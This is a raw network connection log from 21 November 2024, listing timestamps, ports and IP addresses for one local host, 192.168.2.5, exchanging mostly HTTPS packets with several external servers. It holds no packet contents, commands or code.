Nov 21, 2024 22:13:10.551446915 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.551455021 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.553767920 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.553869963 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.553920031 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.553930044 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.553971052 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.556071043 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.558526039 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.558685064 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.558692932 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.560887098 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.560937881 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.560945988 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.563234091 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.563327074 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.563333988 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.564596891 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.564630032 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:10.564728022 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.564764977 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.564768076 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:10.564817905 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.565035105 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.565045118 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:10.565104961 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.565253019 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.565295935 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:10.565464020 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.565476894 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.565493107 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:10.565505981 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.565530062 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.565537930 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.565618038 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.565629959 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:10.565715075 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.565726995 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:10.565957069 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.565974951 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:10.567842007 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.568660975 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.568670034 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.679384947 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.679406881 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.689831018 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.689903975 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.689937115 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.689948082 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.689985037 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.690268040 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.690359116 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.690422058 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.886775970 CET	50018	443	192.168.2.5	104.126.116.81
Nov 21, 2024 22:13:10.886837006 CET	443	50018	104.126.116.81	192.168.2.5
Nov 21, 2024 22:13:10.887162924 CET	50018	443	192.168.2.5	104.126.116.81
Nov 21, 2024 22:13:10.887356997 CET	50018	443	192.168.2.5	104.126.116.81
Nov 21, 2024 22:13:10.887376070 CET	443	50018	104.126.116.81	192.168.2.5
Nov 21, 2024 22:13:10.887778997 CET	50019	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.887823105 CET	443	50019	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:10.888899088 CET	50019	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.889930964 CET	50019	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:10.889944077 CET	443	50019	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:10.894187927 CET	50020	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:13:10.894206047 CET	443	50020	20.110.205.119	192.168.2.5
Nov 21, 2024 22:13:10.894298077 CET	50020	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:13:10.895715952 CET	50020	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:13:10.895730972 CET	443	50020	20.110.205.119	192.168.2.5
Nov 21, 2024 22:13:10.900356054 CET	50022	443	192.168.2.5	104.126.116.83
Nov 21, 2024 22:13:10.900392056 CET	443	50022	104.126.116.83	192.168.2.5
Nov 21, 2024 22:13:10.900450945 CET	50022	443	192.168.2.5	104.126.116.83
Nov 21, 2024 22:13:10.901133060 CET	50022	443	192.168.2.5	104.126.116.83
Nov 21, 2024 22:13:10.901146889 CET	443	50022	104.126.116.83	192.168.2.5
Nov 21, 2024 22:13:10.901437044 CET	50023	443	192.168.2.5	18.238.49.99
Nov 21, 2024 22:13:10.901452065 CET	443	50023	18.238.49.99	192.168.2.5
Nov 21, 2024 22:13:10.901499987 CET	50023	443	192.168.2.5	18.238.49.99
Nov 21, 2024 22:13:10.901981115 CET	50023	443	192.168.2.5	18.238.49.99
Nov 21, 2024 22:13:10.901994944 CET	443	50023	18.238.49.99	192.168.2.5
Nov 21, 2024 22:13:10.902751923 CET	50024	443	192.168.2.5	23.57.90.111
Nov 21, 2024 22:13:10.902781010 CET	443	50024	23.57.90.111	192.168.2.5
Nov 21, 2024 22:13:10.903011084 CET	50024	443	192.168.2.5	23.57.90.111
Nov 21, 2024 22:13:10.903753042 CET	50024	443	192.168.2.5	23.57.90.111
Nov 21, 2024 22:13:10.903772116 CET	443	50024	23.57.90.111	192.168.2.5
Nov 21, 2024 22:13:11.065979958 CET	50025	443	192.168.2.5	152.195.19.97
Nov 21, 2024 22:13:11.066020012 CET	443	50025	152.195.19.97	192.168.2.5
Nov 21, 2024 22:13:11.067162991 CET	50025	443	192.168.2.5	152.195.19.97
Nov 21, 2024 22:13:11.067970037 CET	50025	443	192.168.2.5	152.195.19.97
Nov 21, 2024 22:13:11.067982912 CET	443	50025	152.195.19.97	192.168.2.5
Nov 21, 2024 22:13:11.144418001 CET	443	50012	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.144757986 CET	50012	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.144785881 CET	443	50012	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.145107031 CET	443	50012	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.145658016 CET	50012	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.145721912 CET	443	50012	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.189841032 CET	443	50011	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.190411091 CET	50011	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.190434933 CET	443	50011	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.191302061 CET	443	50011	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.191381931 CET	50011	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.191987038 CET	50011	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.192040920 CET	443	50011	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.215605021 CET	80	50010	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:11.215713978 CET	50010	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:11.336467981 CET	50012	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.336788893 CET	50011	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.336811066 CET	443	50011	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.443627119 CET	50011	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.792418003 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.792877913 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.792895079 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.793984890 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.794105053 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.796202898 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.796274900 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.796525002 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.802691936 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.803333044 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.803359032 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.803380013 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.803709030 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.803724051 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.804944992 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.805351019 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.805355072 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.805577040 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.808155060 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.808155060 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.808175087 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.808240891 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.808495045 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.808583975 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.809598923 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.809607983 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.823916912 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.824312925 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.824323893 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.827464104 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.827605963 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.827971935 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.827971935 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.827987909 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.828061104 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.839334965 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.942151070 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.942158937 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.992455959 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.992456913 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.992470980 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:11.992479086 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:11.992511988 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.081398010 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.144541979 CET	443	50018	104.126.116.81	192.168.2.5
Nov 21, 2024 22:13:12.146435976 CET	50018	443	192.168.2.5	104.126.116.81
Nov 21, 2024 22:13:12.146447897 CET	443	50018	104.126.116.81	192.168.2.5
Nov 21, 2024 22:13:12.147520065 CET	443	50018	104.126.116.81	192.168.2.5
Nov 21, 2024 22:13:12.147650957 CET	50018	443	192.168.2.5	104.126.116.81
Nov 21, 2024 22:13:12.150065899 CET	50018	443	192.168.2.5	104.126.116.81
Nov 21, 2024 22:13:12.150154114 CET	443	50018	104.126.116.81	192.168.2.5
Nov 21, 2024 22:13:12.160392046 CET	443	50022	104.126.116.83	192.168.2.5
Nov 21, 2024 22:13:12.160681009 CET	50022	443	192.168.2.5	104.126.116.83
Nov 21, 2024 22:13:12.160707951 CET	443	50022	104.126.116.83	192.168.2.5
Nov 21, 2024 22:13:12.164346933 CET	443	50022	104.126.116.83	192.168.2.5
Nov 21, 2024 22:13:12.164416075 CET	50022	443	192.168.2.5	104.126.116.83
Nov 21, 2024 22:13:12.167174101 CET	50022	443	192.168.2.5	104.126.116.83
Nov 21, 2024 22:13:12.167397022 CET	443	50022	104.126.116.83	192.168.2.5
Nov 21, 2024 22:13:12.173435926 CET	443	50024	23.57.90.111	192.168.2.5
Nov 21, 2024 22:13:12.173676014 CET	50024	443	192.168.2.5	23.57.90.111
Nov 21, 2024 22:13:12.173712015 CET	443	50024	23.57.90.111	192.168.2.5
Nov 21, 2024 22:13:12.177545071 CET	443	50024	23.57.90.111	192.168.2.5
Nov 21, 2024 22:13:12.177628040 CET	50024	443	192.168.2.5	23.57.90.111
Nov 21, 2024 22:13:12.178520918 CET	50024	443	192.168.2.5	23.57.90.111
Nov 21, 2024 22:13:12.178605080 CET	443	50024	23.57.90.111	192.168.2.5
Nov 21, 2024 22:13:12.183181047 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.183197975 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.210232019 CET	443	50019	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.210527897 CET	50019	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.210551977 CET	443	50019	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.214505911 CET	443	50019	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.214575052 CET	50019	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.215338945 CET	50019	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.215507984 CET	443	50019	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.235017061 CET	50022	443	192.168.2.5	104.126.116.83
Nov 21, 2024 22:13:12.235038042 CET	443	50022	104.126.116.83	192.168.2.5
Nov 21, 2024 22:13:12.266112089 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:12.266151905 CET	443	50031	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:12.266213894 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:12.266554117 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:12.266571045 CET	443	50031	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:12.289478064 CET	50024	443	192.168.2.5	23.57.90.111
Nov 21, 2024 22:13:12.289505959 CET	443	50024	23.57.90.111	192.168.2.5
Nov 21, 2024 22:13:12.289509058 CET	50018	443	192.168.2.5	104.126.116.81
Nov 21, 2024 22:13:12.289520979 CET	443	50018	104.126.116.81	192.168.2.5
Nov 21, 2024 22:13:12.331279993 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.331398010 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.331433058 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.331450939 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.331449986 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.331481934 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.331495047 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.331506014 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.331566095 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.331612110 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.331614017 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.331630945 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.331665993 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.331690073 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.331696987 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.336364031 CET	50019	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.336365938 CET	50022	443	192.168.2.5	104.126.116.83
Nov 21, 2024 22:13:12.336385012 CET	443	50019	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.339992046 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.340032101 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.340043068 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.340064049 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.340080976 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.340090990 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.340112925 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.340157986 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.340204000 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.340233088 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.356858969 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.356883049 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.356889963 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.356930017 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.356955051 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.356967926 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.356992960 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.357024908 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.357044935 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.357044935 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.357044935 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.357067108 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.389832020 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.389906883 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.389926910 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.389945030 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.389983892 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.389985085 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.390007019 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.390031099 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.390036106 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.390054941 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.390085936 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.447365999 CET	50019	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.449388981 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.449402094 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.449446917 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.449450970 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.449481964 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.449486017 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.449503899 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.455564022 CET	443	50023	18.238.49.99	192.168.2.5
Nov 21, 2024 22:13:12.455796003 CET	50023	443	192.168.2.5	18.238.49.99
Nov 21, 2024 22:13:12.455811024 CET	443	50023	18.238.49.99	192.168.2.5
Nov 21, 2024 22:13:12.457448959 CET	443	50023	18.238.49.99	192.168.2.5
Nov 21, 2024 22:13:12.457520962 CET	50023	443	192.168.2.5	18.238.49.99
Nov 21, 2024 22:13:12.458475113 CET	50023	443	192.168.2.5	18.238.49.99
Nov 21, 2024 22:13:12.458560944 CET	443	50023	18.238.49.99	192.168.2.5
Nov 21, 2024 22:13:12.462312937 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.462347984 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.462366104 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.462399006 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.462434053 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.462449074 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.478636026 CET	50024	443	192.168.2.5	23.57.90.111
Nov 21, 2024 22:13:12.478636980 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.478677034 CET	50018	443	192.168.2.5	104.126.116.81
Nov 21, 2024 22:13:12.484364033 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.484391928 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.484431028 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.484472990 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.484482050 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.499157906 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.499166965 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.499183893 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.499192953 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.499214888 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.499228954 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.499269009 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.504556894 CET	443	50020	20.110.205.119	192.168.2.5
Nov 21, 2024 22:13:12.504975080 CET	50020	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:13:12.504985094 CET	443	50020	20.110.205.119	192.168.2.5
Nov 21, 2024 22:13:12.505939960 CET	443	50020	20.110.205.119	192.168.2.5
Nov 21, 2024 22:13:12.506052017 CET	50020	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:13:12.506974936 CET	50020	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:13:12.507033110 CET	443	50020	20.110.205.119	192.168.2.5
Nov 21, 2024 22:13:12.510272026 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.510298967 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.510339975 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.510348082 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.510377884 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.510401964 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.510416031 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.512567043 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.512588978 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.512607098 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.512633085 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.512651920 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.512670040 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.512679100 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.512687922 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.512715101 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.512720108 CET	443	50016	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.512739897 CET	50016	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.534615993 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.534657001 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.534673929 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.534679890 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.534696102 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.534723043 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.534729958 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.551501989 CET	50023	443	192.168.2.5	18.238.49.99
Nov 21, 2024 22:13:12.551520109 CET	443	50023	18.238.49.99	192.168.2.5
Nov 21, 2024 22:13:12.551522017 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.551537037 CET	50020	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:13:12.551547050 CET	443	50020	20.110.205.119	192.168.2.5
Nov 21, 2024 22:13:12.566991091 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.567055941 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.567065001 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.567092896 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.567126036 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.567131996 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.567146063 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.567198992 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.567219019 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.567246914 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.567264080 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.567277908 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.567298889 CET	443	50015	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.567303896 CET	50015	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.572087049 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.572096109 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.572140932 CET	443	50014	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.572174072 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.572206020 CET	50014	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.584115982 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.584139109 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.584192038 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:12.584207058 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:12.584220886 CET	50013	443	192.168.2.5	23.44.203.17
